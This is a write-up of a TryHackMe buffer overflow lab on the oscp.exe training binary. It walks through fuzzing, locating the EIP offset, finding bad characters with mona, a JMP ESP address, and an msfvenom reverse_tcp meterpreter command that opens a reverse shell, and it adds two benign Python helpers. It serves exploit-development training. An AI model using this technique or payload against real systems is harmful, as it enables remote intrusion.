OSCP prep [Buffer Overflow]
Hello guys, today we are going to solve a buffer overflow from the TryHackMe room https://tryhackme.com/room/bufferoverflowprep
I'm going to go over a single buffer (OVERFLOW1) because the room is quite big and has many tasks. If you guys want to develop your skills further in buffer overflows, do go through this room; I'm sure it'll help you a lot.
To understand what I'm about to do you need a bit of previous working knowledge of buffer overflows, so be sure you understand basic buffer overflows first.
So what I did was, instead of using RDP and working on a different machine over the network, I downloaded oscp.exe from the remote machine and ran it on my own Windows machine. This step isn't necessary; I just did it to make myself more comfortable.
So let's start
1. Let's run the application
2. Our target is OVERFLOW1, so let's open it in Immunity Debugger
3. Let's start by sending a large amount of junk data in order to crash the application
Well, it worked properly. Let's write a script to fuzz it
This is the script I'm going to use
As you can see, the offset is near 2100 bytes
EIP has been completely overwritten by our data
4. Let's create a cyclic pattern using the msf-pattern_create tool
Now we will send this data. You can send it using a script; I'm going to do it manually
The most important thing right now is the EIP register. Take the value in EIP, which is 6F43396E, and feed it to msf-pattern_offset; it will give you the exact offset
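To see what msf-pattern_create and msf-pattern_offset actually do with that EIP value, here is an added example (not part of the original post or of Metasploit) that rebuilds the same cyclic pattern in plain Python. It assumes the standard Metasploit pattern layout (Aa0Aa1Aa2 ... Ab0 ...) and a 2100-byte pattern as the post uses; the function names are my own. The key point it shows is the endianness step: the debugger prints EIP as 6F43396E, but on x86 the bytes sitting in memory are reversed, so you have to search the pattern for the little-endian form.

```python
# Added example: re-implementation of the cyclic-pattern offset lookup used
# above, so the EIP value from the debugger can be checked without Metasploit.
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the Metasploit-style pattern Aa0Aa1Aa2...Ab0...

    Every 3-byte triple (upper, lower, digit) is unique, which is what makes
    any 4-byte window inside the pattern locatable.
    """
    out = bytearray()
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern supports at most %d bytes" % (26 * 26 * 10 * 3))


def eip_to_memory_bytes(eip_value: int) -> bytes:
    """The debugger shows EIP as a 32-bit number; x86 stores it little-endian,
    so the 4 bytes that were actually in the buffer are the reverse order."""
    return struct.pack("<I", eip_value)


def pattern_offset(eip_value: int, length: int = 2100) -> int:
    """Offset (in bytes) at which the 4 bytes now in EIP sat in the pattern.

    Equivalent to: msf-pattern_offset -q <eip_value> -l <length>
    """
    needle = eip_to_memory_bytes(eip_value)
    pat = pattern_create(length)
    off = pat.find(needle)
    if off == -1:
        raise ValueError("EIP value not found; check endianness or pattern length")
    return off


if __name__ == "__main__":
    # Value read from EIP in the post: 6F43396E -> bytes b"n9Co" in memory.
    print(eip_to_memory_bytes(0x6F43396E))   # b'n9Co'
    print(pattern_offset(0x6F43396E))        # 1978
    # Sanity check for the next step: BBBB overwriting EIP reads as 42424242.
    print(eip_to_memory_bytes(0x42424242))   # b'BBBB'
```

Running this on the EIP value from the post gives 1978, which is the number you want to see from msf-pattern_offset before moving on; if `pattern_offset` raises, the usual reasons are that the pattern sent was shorter than the crash point or that the value was searched for in the printed (big-endian) order.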
5. Now we know the offset, so let's begin with exploit development
After filling the buffer up to the offset we overwrite EIP with BBBB, which is 42424242 in hex, to confirm we control it
6. Now let's find the bad characters; for this we will use the mona module
Let's create a bytearray using mona
!mona bytearray -b "\x00"
This will create a bytearray excluding \x00, which is the null terminator and is almost always a bad character
You also have to use a bad character list in your exploit; you can get one from this repository: https://github.com/cytopia/badchars
Let's run the script
After the crash use
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP pointer address>
As you can see, we are getting bad chars. One thing to look out for while doing this: if 07 is corrupted then it can corrupt 08 as well, so remove only the first bad character of such a pair and retry the whole process.
Now I'm going to remove all the bad chars I found from my list and retry the whole process. Try again and again until you get something like this
After we have found every bad character we proceed to the next step
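The 07/08 caveat above is easier to reason about once you see what the comparison is doing. The following is an added example, not from the original post or from mona, that reproduces the idea of `!mona bytearray` and `!mona compare` in Python: build the byte array, diff it against what was found at ESP after the crash, and separate the first byte of each corrupted run from the bytes right behind it. The crash memory here is a constructed sample (the target is pretended to null out 07, the neighbouring 08, and a0); the function names are my own.

```python
# Added example: what "!mona compare" is checking, and why a byte following a
# bad character should not be trusted as bad until it is re-tested on its own.
from typing import List, Tuple


def make_bytearray(excluded: bytes = b"\x00") -> bytes:
    """Same idea as: !mona bytearray -b "\\x00"
    Every byte value 0x00-0xff except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in excluded)


def compare(sent: bytes, found: bytes) -> List[Tuple[int, int, int]]:
    """Return (index, sent_byte, found_byte) for each position that differs.
    `found` is what the debugger shows at ESP after the crash. If `found` is
    shorter (truncated by a null), only the overlapping part is compared."""
    return [(i, s, f) for i, (s, f) in enumerate(zip(sent, found)) if s != f]


def suspected_badchars(sent: bytes, found: bytes) -> Tuple[List[int], List[int]]:
    """Split mismatches into:
      confirmed  - first byte of each run of corruption (remove these now)
      collateral - bytes immediately after a mismatch; often mangled only
                   because of their neighbour (the 08 after a bad 07), so
                   re-test them in the next round instead of removing them."""
    diffs = compare(sent, found)
    confirmed: List[int] = []
    collateral: List[int] = []
    prev_idx = None
    for idx, sent_byte, _found_byte in diffs:
        if prev_idx is not None and idx == prev_idx + 1:
            collateral.append(sent_byte)
        else:
            confirmed.append(sent_byte)
        prev_idx = idx
    return confirmed, collateral


def demo() -> Tuple[List[int], List[int]]:
    """Constructed sample: the program replaces 0x07 with 0x00, which also
    mangles the following 0x08, and separately replaces 0xa0 with 0x00."""
    sent = make_bytearray()
    found = bytearray(sent)
    for bad in (0x07, 0x08, 0xA0):
        found[sent.index(bad)] = 0x00
    return suspected_badchars(sent, bytes(found))


if __name__ == "__main__":
    confirmed, collateral = demo()
    print("remove now:   ", [hex(b) for b in confirmed])   # ['0x7', '0xa0']
    print("re-test later:", [hex(b) for b in collateral])  # ['0x8']
```

The round ends when `compare` returns an empty list, i.e. the byte array found at ESP matches what was sent; until then, drop only the `confirmed` bytes, regenerate the array without them, and run the comparison again so that a collateral byte like 08 gets a fair test on its own.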
7. JMP ESP
Search for a JMP ESP instruction using mona, excluding the bad characters
!mona jmp -r esp -cpb <all the bad characters>
We are going to use the first one, 0x625011af, and convert it to little-endian format: \xaf\x11\x50\x62
Add this to our script/exploit
8. Payload
We are going to create a payload that excludes the bad characters using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -b <bad characters> EXITFUNC=thread -f py -v payload
and add the payload to the script
Also add some padding using NOPs (\x90)
Start a listener
And voila, we got a connection back